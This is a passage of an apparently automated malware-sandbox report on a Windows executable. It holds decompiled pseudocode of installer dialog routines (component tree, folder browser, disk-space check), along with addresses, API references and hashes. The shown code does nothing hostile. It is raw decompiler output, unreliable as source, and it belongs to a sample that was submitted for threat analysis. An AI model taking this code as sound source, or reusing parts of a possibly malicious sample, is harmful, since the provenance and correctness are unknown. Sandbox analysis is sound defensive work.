                                                                                            													_t206 = _t206 + 3;
                                                                                            												}
                                                                                            											} else {
                                                                                            												_t206 = 3;
                                                                                            											}
                                                                                            											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                            											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                            											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                                            										}
                                                                                            										_v16 = _v16 + 1;
                                                                                            										_t281 =  &(_t281[0x106]);
                                                                                            									} while (_v16 <  *0x423ecc);
                                                                                            									goto L84;
                                                                                            								} else {
                                                                                            									_t282 = E004012E2( *0x42048c);
                                                                                            									E00401299(_t282);
                                                                                            									_t217 = 0;
                                                                                            									_t289 = 0;
                                                                                            									if(_t282 <= _t315) {
                                                                                            										L72:
                                                                                            										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                            										_a16 = _t282;
                                                                                            										_a8 = 0x420;
                                                                                            										goto L73;
                                                                                            									} else {
                                                                                            										goto L69;
                                                                                            									}
                                                                                            									do {
                                                                                            										L69:
                                                                                            										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                                            											_t289 = _t289 + 1;
                                                                                            										}
                                                                                            										_t217 = _t217 + 1;
                                                                                            									} while (_t217 < _t282);
                                                                                            									goto L72;
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                            							goto L89;
                                                                                            						} else {
                                                                                            							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                            							if(_t227 == 0xffffffff) {
                                                                                            								goto L89;
                                                                                            							}
                                                                                            							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                            							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                                            								_t283 = 0x20;
                                                                                            							}
                                                                                            							E00401299(_t283);
                                                                                            							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                            							_a12 = 1;
                                                                                            							_a16 = _t315;
                                                                                            							_a8 = 0x40f;
                                                                                            							goto L56;
                                                                                            						}
                                                                                            					}
                                                                                            				} else {
                                                                                            					 *0x423f00 = _a4;
                                                                                            					_t285 = 2;
                                                                                            					_v28 = 0;
                                                                                            					_v16 = _t285;
                                                                                            					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
                                                                                            					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                                                                                            					 *0x420480 =  *0x420480 | 0xffffffff;
                                                                                            					_v24 = _t250;
                                                                                            					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                                                                                            					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                            					 *0x420474 = _t252;
                                                                                            					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                                            					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                                                                                            					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                            						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                            					}
                                                                                            					DeleteObject(_v24);
                                                                                            					_t286 = 0;
                                                                                            					do {
                                                                                            						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                            						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                            							if(_t286 != 0x20) {
                                                                                            								_v16 = _t315;
                                                                                            							}
                                                                                            							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                                            						}
                                                                                            						_t286 = _t286 + 1;
                                                                                            					} while (_t286 < 0x21);
                                                                                            					_t317 = _a16;
                                                                                            					_t287 = _v16;
                                                                                            					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                            					_push(0x15);
                                                                                            					E00403E37(_a4);
                                                                                            					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                            					_push(0x16);
                                                                                            					E00403E37(_a4);
                                                                                            					_t318 = 0;
                                                                                            					_t288 = 0;
                                                                                            					if( *0x423ecc <= 0) {
                                                                                            						L19:
                                                                                            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                            						goto L20;
                                                                                            					} else {
                                                                                            						_t311 = _v32 + 8;
                                                                                            						_v24 = _t311;
                                                                                            						do {
                                                                                            							_t268 = _t311 + 0x10;
                                                                                            							if( *_t268 != 0) {
                                                                                            								_v60 = _t268;
                                                                                            								_t269 =  *_t311;
                                                                                            								_t302 = 0x20;
                                                                                            								_v84 = _t288;
                                                                                            								_v80 = 0xffff0002;
                                                                                            								_v76 = 0xd;
                                                                                            								_v64 = _t302;
                                                                                            								_v40 = _t318;
                                                                                            								_v68 = _t269 & _t302;
                                                                                            								if((_t269 & 0x00000002) == 0) {
                                                                                            									if((_t269 & 0x00000004) == 0) {
                                                                                            										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                            									} else {
                                                                                            										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                            									}
                                                                                            								} else {
                                                                                            									_v76 = 0x4d;
                                                                                            									_v44 = 1;
                                                                                            									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                            									_v28 = 1;
                                                                                            									 *( *0x42048c + _t318 * 4) = _t274;
                                                                                            									_t288 =  *( *0x42048c + _t318 * 4);
                                                                                            								}
                                                                                            							}
                                                                                            							_t318 = _t318 + 1;
                                                                                            							_t311 = _v24 + 0x418;
                                                                                            							_v24 = _t311;
                                                                                            						} while (_t318 <  *0x423ecc);
                                                                                            						if(_v28 != 0) {
                                                                                            							L20:
                                                                                            							if(_v16 != 0) {
                                                                                            								E00403E6C(_v8);
                                                                                            								_t280 = _v32;
                                                                                            								_t315 = 0;
                                                                                            								goto L23;
                                                                                            							} else {
                                                                                            								ShowWindow(_v12, 5);
                                                                                            								E00403E6C(_v12);
                                                                                            								L89:
                                                                                            								return E00403E9E(_a8, _a12, _a16);
                                                                                            							}
                                                                                            						}
                                                                                            						goto L19;
                                                                                            					}
                                                                                            				}
                                                                                            			}


























































                                                                                            0x00404790
                                                                                            0x00404796
                                                                                            0x00404798
                                                                                            0x0040479e
                                                                                            0x004047a4
                                                                                            0x004047b1
                                                                                            0x004047ba
                                                                                            0x004047bd
                                                                                            0x004047c0
                                                                                            0x004049e8
                                                                                            0x004049ef
                                                                                            0x00404a03
                                                                                            0x004049f1
                                                                                            0x004049f3
                                                                                            0x004049f6
                                                                                            0x004049f7
                                                                                            0x004049fe
                                                                                            0x004049fe
                                                                                            0x00404a0f
                                                                                            0x00404a1d
                                                                                            0x00404a20
                                                                                            0x00404a36
                                                                                            0x00404aae
                                                                                            0x00404ab1
                                                                                            0x00404ab3
                                                                                            0x00404abd
                                                                                            0x00404acb
                                                                                            0x00404acb
                                                                                            0x00404acd
                                                                                            0x00404ad7
                                                                                            0x00404add
                                                                                            0x00404afe
                                                                                            0x00404adf
                                                                                            0x00404aec
                                                                                            0x00404aec
                                                                                            0x00404add
                                                                                            0x00404ad7
                                                                                            0x00000000
                                                                                            0x00404ab1
                                                                                            0x00404a3b
                                                                                            0x00404a46
                                                                                            0x00404a4b
                                                                                            0x00404a52
                                                                                            0x00404a59
                                                                                            0x00404a63
                                                                                            0x00404a63
                                                                                            0x00404a67
                                                                                            0x00404a6c
                                                                                            0x00404a71
                                                                                            0x00404a87
                                                                                            0x00404a73
                                                                                            0x00404a73
                                                                                            0x00404a7b
                                                                                            0x00404a82
                                                                                            0x00404a7d
                                                                                            0x00404a7d
                                                                                            0x00404a7d
                                                                                            0x00404a7b
                                                                                            0x00404a8b
                                                                                            0x00404a8d
                                                                                            0x00404a9b
                                                                                            0x00404a9c
                                                                                            0x00404aa8
                                                                                            0x00404aab
                                                                                            0x00404aab
                                                                                            0x00404a6c
                                                                                            0x00000000
                                                                                            0x00404a59
                                                                                            0x00404a3d
                                                                                            0x00404a44
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404b01
                                                                                            0x00404b01
                                                                                            0x00404b08
                                                                                            0x00404b7c
                                                                                            0x00404b83
                                                                                            0x00404b8f
                                                                                            0x00404b8f
                                                                                            0x00404b98
                                                                                            0x00404b9a
                                                                                            0x00404ba1
                                                                                            0x00404ba4
                                                                                            0x00404ba4
                                                                                            0x00404baa
                                                                                            0x00404bb1
                                                                                            0x00404bb4
                                                                                            0x00404bb4
                                                                                            0x00404bba
                                                                                            0x00404bc0
                                                                                            0x00404bc6
                                                                                            0x00404bc6
                                                                                            0x00404bd3
                                                                                            0x00404d20
                                                                                            0x00404d27
                                                                                            0x00404d44
                                                                                            0x00404d4a
                                                                                            0x00404d5c
                                                                                            0x00404d5c
                                                                                            0x00000000
                                                                                            0x00404bd9
                                                                                            0x00404bdb
                                                                                            0x00404be3
                                                                                            0x00404be7
                                                                                            0x00404be7
                                                                                            0x00404bef
                                                                                            0x00404c30
                                                                                            0x00404c32
                                                                                            0x00404c42
                                                                                            0x00404c45
                                                                                            0x00404c4a
                                                                                            0x00404c51
                                                                                            0x00404c54
                                                                                            0x00404cf6
                                                                                            0x00404cfc
                                                                                            0x00404d0a
                                                                                            0x00404d1b
                                                                                            0x00404d1b
                                                                                            0x00000000
                                                                                            0x00404d0a
                                                                                            0x00404c5a
                                                                                            0x00404c5d
                                                                                            0x00404c63
                                                                                            0x00404c68
                                                                                            0x00404c6a
                                                                                            0x00404c6c
                                                                                            0x00404c72
                                                                                            0x00404c79
                                                                                            0x00404c7e
                                                                                            0x00404c85
                                                                                            0x00404c88
                                                                                            0x00404c88
                                                                                            0x00404c8f
                                                                                            0x00404c9b
                                                                                            0x00404c9f
                                                                                            0x00404ca1
                                                                                            0x00404ca1
                                                                                            0x00404c91
                                                                                            0x00404c93
                                                                                            0x00404c93
                                                                                            0x00404cc1
                                                                                            0x00404ccd
                                                                                            0x00404cdc
                                                                                            0x00404cdc
                                                                                            0x00404cde
                                                                                            0x00404ce1
                                                                                            0x00404cea
                                                                                            0x00000000
                                                                                            0x00404bf1
                                                                                            0x00404bfc
                                                                                            0x00404bff
                                                                                            0x00404c04
                                                                                            0x00404c06
                                                                                            0x00404c0a
                                                                                            0x00404c1a
                                                                                            0x00404c24
                                                                                            0x00404c26
                                                                                            0x00404c29
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404c0c
                                                                                            0x00404c0c
                                                                                            0x00404c12
                                                                                            0x00404c14
                                                                                            0x00404c14
                                                                                            0x00404c15
                                                                                            0x00404c16
                                                                                            0x00000000
                                                                                            0x00404c0c
                                                                                            0x00404bef
                                                                                            0x00404bd3
                                                                                            0x00404b10
                                                                                            0x00000000
                                                                                            0x00404b26
                                                                                            0x00404b30
                                                                                            0x00404b35
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404b47
                                                                                            0x00404b4c
                                                                                            0x00404b58
                                                                                            0x00404b58
                                                                                            0x00404b5a
                                                                                            0x00404b69
                                                                                            0x00404b6b
                                                                                            0x00404b72
                                                                                            0x00404b75
                                                                                            0x00000000
                                                                                            0x00404b75
                                                                                            0x00404b10
                                                                                            0x004047c6
                                                                                            0x004047cb
                                                                                            0x004047d5
                                                                                            0x004047d6
                                                                                            0x004047df
                                                                                            0x004047ea
                                                                                            0x004047f5
                                                                                            0x004047fb
                                                                                            0x00404809
                                                                                            0x0040481e
                                                                                            0x00404823
                                                                                            0x0040482e
                                                                                            0x00404837
                                                                                            0x0040484c
                                                                                            0x0040485d
                                                                                            0x0040486a
                                                                                            0x0040486a
                                                                                            0x0040486f
                                                                                            0x00404875
                                                                                            0x00404877
                                                                                            0x0040487a
                                                                                            0x0040487f
                                                                                            0x00404884
                                                                                            0x00404886
                                                                                            0x00404886
                                                                                            0x004048a6
                                                                                            0x004048a6
                                                                                            0x004048a8
                                                                                            0x004048a9
                                                                                            0x004048ae
                                                                                            0x004048b1
                                                                                            0x004048b4
                                                                                            0x004048b8
                                                                                            0x004048bd
                                                                                            0x004048c2
                                                                                            0x004048c6
                                                                                            0x004048cb
                                                                                            0x004048d0
                                                                                            0x004048d2
                                                                                            0x004048da
                                                                                            0x004049a4
                                                                                            0x004049b7
                                                                                            0x00000000
                                                                                            0x004048e0
                                                                                            0x004048e3
                                                                                            0x004048e6
                                                                                            0x004048e9
                                                                                            0x004048e9
                                                                                            0x004048ef
                                                                                            0x004048f5
                                                                                            0x004048f8
                                                                                            0x004048fe
                                                                                            0x004048ff
                                                                                            0x00404904
                                                                                            0x0040490d
                                                                                            0x00404914
                                                                                            0x00404917
                                                                                            0x0040491a
                                                                                            0x0040491d
                                                                                            0x00404959
                                                                                            0x00404982
                                                                                            0x0040495b
                                                                                            0x00404968
                                                                                            0x00404968
                                                                                            0x0040491f
                                                                                            0x00404922
                                                                                            0x00404931
                                                                                            0x0040493b
                                                                                            0x00404943
                                                                                            0x0040494a
                                                                                            0x00404952
                                                                                            0x00404952
                                                                                            0x0040491d
                                                                                            0x00404988
                                                                                            0x00404989
                                                                                            0x00404995
                                                                                            0x00404995
                                                                                            0x004049a2
                                                                                            0x004049bd
                                                                                            0x004049c1
                                                                                            0x004049de
                                                                                            0x004049e3
                                                                                            0x004049e6
                                                                                            0x00000000
                                                                                            0x004049c3
                                                                                            0x004049c8
                                                                                            0x004049d1
                                                                                            0x00404d5e
                                                                                            0x00404d70
                                                                                            0x00404d70
                                                                                            0x004049c1
                                                                                            0x00000000
                                                                                            0x004049a2
                                                                                            0x004048da

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00404789
                                                                                            • GetDlgItem.USER32 ref: 00404796
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
                                                                                            • LoadBitmapA.USER32 ref: 004047F5
                                                                                            • SetWindowLongA.USER32 ref: 0040480F
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                                                                                            • DeleteObject.GDI32(?), ref: 0040486F
                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                                                                                            • GetWindowLongA.USER32 ref: 004049A9
                                                                                            • SetWindowLongA.USER32 ref: 004049B7
                                                                                            • ShowWindow.USER32(?,00000005), ref: 004049C8
                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                                                                                            • GlobalFree.KERNEL32 ref: 00404BB4
                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                                                                                            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404D4A
                                                                                            • GetDlgItem.USER32 ref: 00404D55
                                                                                            • ShowWindow.USER32(00000000), ref: 00404D5C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 1638840714-813528018
                                                                                            • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                                                                                            • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                                                                                            • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                                                                                            • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 78%
                                                                                            			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                            				signed int _v8;
                                                                                            				struct HWND__* _v12;
                                                                                            				long _v16;
                                                                                            				long _v20;
                                                                                            				char _v24;
                                                                                            				long _v28;
                                                                                            				char _v32;
                                                                                            				intOrPtr _v36;
                                                                                            				long _v40;
                                                                                            				signed int _v44;
                                                                                            				CHAR* _v52;
                                                                                            				intOrPtr _v56;
                                                                                            				intOrPtr _v60;
                                                                                            				intOrPtr _v64;
                                                                                            				CHAR* _v68;
                                                                                            				void _v72;
                                                                                            				char _v76;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				intOrPtr _t81;
                                                                                            				long _t86;
                                                                                            				signed char* _t88;
                                                                                            				void* _t94;
                                                                                            				signed int _t95;
                                                                                            				signed short _t113;
                                                                                            				signed int _t117;
                                                                                            				char* _t122;
                                                                                            				intOrPtr* _t138;
                                                                                            				signed int* _t145;
                                                                                            				signed int _t148;
                                                                                            				signed int _t153;
                                                                                            				struct HWND__* _t159;
                                                                                            				CHAR* _t162;
                                                                                            				int _t163;
                                                                                            
                                                                                            				_t81 =  *0x41fc68; // 0x0
                                                                                            				_v36 = _t81;
                                                                                            				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                                                                                            				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                                                                            				if(_a8 == 0x40b) {
                                                                                            					E0040532A(0x3fb, _t162);
                                                                                            					E00405CE3(_t162);
                                                                                            				}
                                                                                            				if(_a8 != 0x110) {
                                                                                            					L8:
                                                                                            					if(_a8 != 0x111) {
                                                                                            						L20:
                                                                                            						if(_a8 == 0x40f) {
                                                                                            							L22:
                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                            							_v12 = _v12 & 0x00000000;
                                                                                            							E0040532A(0x3fb, _t162);
                                                                                            							if(E00405659(_t180, _t162) == 0) {
                                                                                            								_v8 = 1;
                                                                                            							}
                                                                                            							E00405A85(0x41f460, _t162);
                                                                                            							_t145 = 0;
                                                                                            							_t86 = E00405DA3(0);
                                                                                            							_v16 = _t86;
                                                                                            							if(_t86 == 0) {
                                                                                            								L31:
                                                                                            								E00405A85(0x41f460, _t162);
                                                                                            								_t88 = E0040560C(0x41f460);
                                                                                            								if(_t88 != _t145) {
                                                                                            									 *_t88 =  *_t88 & 0x00000000;
                                                                                            								}
                                                                                            								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                                                                            									_t153 = _a8;
                                                                                            									goto L37;
                                                                                            								} else {
                                                                                            									_t163 = 0x400;
                                                                                            									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                                                                            									_v12 = 1;
                                                                                            									goto L38;
                                                                                            								}
                                                                                            							} else {
                                                                                            								if(0 == 0x41f460) {
                                                                                            									L30:
                                                                                            									_t145 = 0;
                                                                                            									goto L31;
                                                                                            								} else {
                                                                                            									goto L26;
                                                                                            								}
                                                                                            								while(1) {
                                                                                            									L26:
                                                                                            									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                                                                                            									if(_t113 != 0) {
                                                                                            										break;
                                                                                            									}
                                                                                            									if(_t145 != 0) {
                                                                                            										 *_t145 =  *_t145 & _t113;
                                                                                            									}
                                                                                            									_t145 = E004055BF(0x41f460) - 1;
                                                                                            									 *_t145 = 0x5c;
                                                                                            									if(_t145 != 0x41f460) {
                                                                                            										continue;
                                                                                            									} else {
                                                                                            										goto L30;
                                                                                            									}
                                                                                            								}
                                                                                            								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                                            								_v12 = 1;
                                                                                            								_t145 = 0;
                                                                                            								L37:
                                                                                            								_t163 = 0x400;
                                                                                            								L38:
                                                                                            								_t94 = E004046C5(5);
                                                                                            								if(_v12 != _t145 && _t153 < _t94) {
                                                                                            									_v8 = 2;
                                                                                            								}
                                                                                            								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
                                                                                            									E00404610(0x3ff, 0xfffffffb, _t94);
                                                                                            									if(_v12 == _t145) {
                                                                                            										SetDlgItemTextA(_a4, _t163, 0x41f450);
                                                                                            									} else {
                                                                                            										E00404610(_t163, 0xfffffffc, _t153);
                                                                                            									}
                                                                                            								}
                                                                                            								_t95 = _v8;
                                                                                            								 *0x423f44 = _t95;
                                                                                            								if(_t95 == _t145) {
                                                                                            									_v8 = E0040140B(7);
                                                                                            								}
                                                                                            								if(( *(_v36 + 0x14) & _t163) != 0) {
                                                                                            									_v8 = _t145;
                                                                                            								}
                                                                                            								E00403E59(0 | _v8 == _t145);
                                                                                            								if(_v8 == _t145 &&  *0x420484 == _t145) {
                                                                                            									E0040420A();
                                                                                            								}
                                                                                            								 *0x420484 = _t145;
                                                                                            								goto L53;
                                                                                            							}
                                                                                            						}
                                                                                            						_t180 = _a8 - 0x405;
                                                                                            						if(_a8 != 0x405) {
                                                                                            							goto L53;
                                                                                            						}
                                                                                            						goto L22;
                                                                                            					}
                                                                                            					_t117 = _a12 & 0x0000ffff;
                                                                                            					if(_t117 != 0x3fb) {
                                                                                            						L12:
                                                                                            						if(_t117 == 0x3e9) {
                                                                                            							_t148 = 7;
                                                                                            							memset( &_v72, 0, _t148 << 2);
                                                                                            							_v76 = _a4;
                                                                                            							_v68 = 0x420498;
                                                                                            							_v56 = E004045AA;
                                                                                            							_v52 = _t162;
                                                                                            							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                                                                                            							_t122 =  &_v76;
                                                                                            							_v60 = 0x41;
                                                                                            							__imp__SHBrowseForFolderA(_t122);
                                                                                            							if(_t122 == 0) {
                                                                                            								_a8 = 0x40f;
                                                                                            							} else {
                                                                                            								__imp__CoTaskMemFree(_t122);
                                                                                            								E00405578(_t162);
                                                                                            								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
                                                                                            								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                                                            									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                                                                                            									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                                                                                            										lstrcatA(_t162, 0x422e40);
                                                                                            									}
                                                                                            								}
                                                                                            								 *0x420484 =  &(( *0x420484)[0]);
                                                                                            								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                                                                            							}
                                                                                            						}
                                                                                            						goto L20;
                                                                                            					}
                                                                                            					if(_a12 >> 0x10 != 0x300) {
                                                                                            						goto L53;
                                                                                            					}
                                                                                            					_a8 = 0x40f;
                                                                                            					goto L12;
                                                                                            				} else {
                                                                                            					_t159 = _a4;
                                                                                            					_v12 = GetDlgItem(_t159, 0x3fb);
                                                                                            					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                                                                                            						E00405578(_t162);
                                                                                            					}
                                                                                            					 *0x423678 = _t159;
                                                                                            					SetWindowTextA(_v12, _t162);
                                                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                            					_push(1);
                                                                                            					E00403E37(_t159);
                                                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                            					_push(0x14);
                                                                                            					E00403E37(_t159);
                                                                                            					E00403E6C(_v12);
                                                                                            					_t138 = E00405DA3(7);
                                                                                            					if(_t138 == 0) {
                                                                                            						L53:
                                                                                            						return E00403E9E(_a8, _a12, _a16);
                                                                                            					}
                                                                                            					 *_t138(_v12, 1);
                                                                                            					goto L8;
                                                                                            				}
                                                                                            			}






































                                                                                            0x0040427b
                                                                                            0x00404282
                                                                                            0x0040428e
                                                                                            0x0040429c
                                                                                            0x004042a4
                                                                                            0x004042a8
                                                                                            0x004042ae
                                                                                            0x004042ae
                                                                                            0x004042ba
                                                                                            0x0040432e
                                                                                            0x00404335
                                                                                            0x0040440a
                                                                                            0x00404411
                                                                                            0x00404420
                                                                                            0x00404420
                                                                                            0x00404424
                                                                                            0x0040442a
                                                                                            0x00404437
                                                                                            0x00404439
                                                                                            0x00404439
                                                                                            0x00404447
                                                                                            0x0040444c
                                                                                            0x0040444f
                                                                                            0x00404456
                                                                                            0x00404459
                                                                                            0x00404490
                                                                                            0x00404492
                                                                                            0x00404498
                                                                                            0x0040449f
                                                                                            0x004044a1
                                                                                            0x004044a1
                                                                                            0x004044bd
                                                                                            0x004044f9
                                                                                            0x00000000
                                                                                            0x004044bf
                                                                                            0x004044c2
                                                                                            0x004044d6
                                                                                            0x004044d8
                                                                                            0x00000000
                                                                                            0x004044d8
                                                                                            0x0040445b
                                                                                            0x0040445f
                                                                                            0x0040448e
                                                                                            0x0040448e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404461
                                                                                            0x00404461
                                                                                            0x0040446e
                                                                                            0x00404473
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404477
                                                                                            0x00404479
                                                                                            0x00404479
                                                                                            0x00404484
                                                                                            0x00404487
                                                                                            0x0040448c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040448c
                                                                                            0x004044e7
                                                                                            0x004044ee
                                                                                            0x004044f5
                                                                                            0x004044fc
                                                                                            0x004044fc
                                                                                            0x00404501
                                                                                            0x00404503
                                                                                            0x0040450b
                                                                                            0x00404511
                                                                                            0x00404511
                                                                                            0x00404521
                                                                                            0x0040452b
                                                                                            0x00404533
                                                                                            0x00404549
                                                                                            0x00404535
                                                                                            0x00404539
                                                                                            0x00404539
                                                                                            0x00404533
                                                                                            0x0040454e
                                                                                            0x00404553
                                                                                            0x00404558
                                                                                            0x00404561
                                                                                            0x00404561
                                                                                            0x0040456a
                                                                                            0x0040456c
                                                                                            0x0040456c
                                                                                            0x00404578
                                                                                            0x00404580
                                                                                            0x0040458a
                                                                                            0x0040458a
                                                                                            0x0040458f
                                                                                            0x00000000
                                                                                            0x0040458f
                                                                                            0x00404459
                                                                                            0x00404413
                                                                                            0x0040441a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040441a
                                                                                            0x0040433b
                                                                                            0x00404341
                                                                                            0x0040435b
                                                                                            0x00404360
                                                                                            0x0040436a
                                                                                            0x00404371
                                                                                            0x00404380
                                                                                            0x00404383
                                                                                            0x00404386
                                                                                            0x0040438d
                                                                                            0x00404395
                                                                                            0x00404398
                                                                                            0x0040439c
                                                                                            0x004043a3
                                                                                            0x004043ab
                                                                                            0x00404403
                                                                                            0x004043ad
                                                                                            0x004043ae
                                                                                            0x004043b5
                                                                                            0x004043bf
                                                                                            0x004043c7
                                                                                            0x004043d4
                                                                                            0x004043e8
                                                                                            0x004043ec
                                                                                            0x004043ec
                                                                                            0x004043e8
                                                                                            0x004043f1
                                                                                            0x004043fc
                                                                                            0x004043fc
                                                                                            0x004043ab
                                                                                            0x00000000
                                                                                            0x00404360
                                                                                            0x0040434e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404354
                                                                                            0x00000000
                                                                                            0x004042bc
                                                                                            0x004042bc
                                                                                            0x004042c8
                                                                                            0x004042d2
                                                                                            0x004042df
                                                                                            0x004042df
                                                                                            0x004042e5
                                                                                            0x004042ee
                                                                                            0x004042f7
                                                                                            0x004042fa
                                                                                            0x004042fd
                                                                                            0x00404305
                                                                                            0x00404308
                                                                                            0x0040430b
                                                                                            0x00404313
                                                                                            0x0040431a
                                                                                            0x00404321
                                                                                            0x00404595
                                                                                            0x004045a7
                                                                                            0x004045a7
                                                                                            0x0040432c
                                                                                            0x00000000
                                                                                            0x0040432c

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 004042C1
